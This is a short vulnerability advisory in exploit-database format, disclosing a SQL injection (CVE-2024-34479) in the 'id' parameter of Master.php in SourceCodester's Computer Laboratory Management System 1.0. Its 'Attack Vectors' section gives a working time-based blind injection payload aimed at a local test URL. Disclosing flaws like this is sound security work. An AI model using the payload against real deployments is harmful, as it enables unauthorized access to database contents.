SourceCodester Computer Laboratory Management System 1.0 (Master.php)

# Exploit Title: SourceCodester Computer Laboratory Management System 1.0 (Master.php) - SQL Injection
# Date: 05 May 2024
# Exploit Author: Kavia Baskar
# Vendor Homepage: https://www.sourcecodester.com/php/17268/computer-laboratory-management-system-using-php-and-mysql.html
# Version: v1.0
# CVE: CVE-2024-34479
# Tested on: Windows, XAMPP, Apache, MySQL


 [Suggested description]
 SourceCodester Computer Laboratory Management System 1.0 allows classes/Master.php id
 SQL Injection.

 ------------------------------------------

 [Vulnerability Type]
 SQL Injection

 ------------------------------------------

 [Vendor of Product]
 SourceCodester

 ------------------------------------------

 [Affected Product Code Base]
 SourceCodester Computer Laboratory Management System - 1.0

 ------------------------------------------

 [Affected Component]
 The functionality allowing users to modify borrowing records information within the application.

 ------------------------------------------

 [Attack Type]
 Local

 ------------------------------------------

 [Impact Code execution]
 true

 ------------------------------------------

 [Impact Denial of Service]
 true

 ------------------------------------------

 [Impact Information Disclosure]
 true

 ------------------------------------------

 [Attack Vectors]
 To exploit this vulnerability, the following payload can be used to retrieve the data from the database ------WebKitFormBoundaryeubsFzqrWToLg4au
 Content-Disposition: form-data; name="id"
 ' AND (SELECT 6270 FROM (SELECT(SLEEP(5)))jgeq) AND 'QpoF'='QpoF  on 'id' parameter on 'http://localhost/php-lms/classes/Master.php?f=save_category'

 ------------------------------------------

[Reference]
 https://www.strongboxit.com/

[Discoverer]
Kavia Baskar with StrongBox IT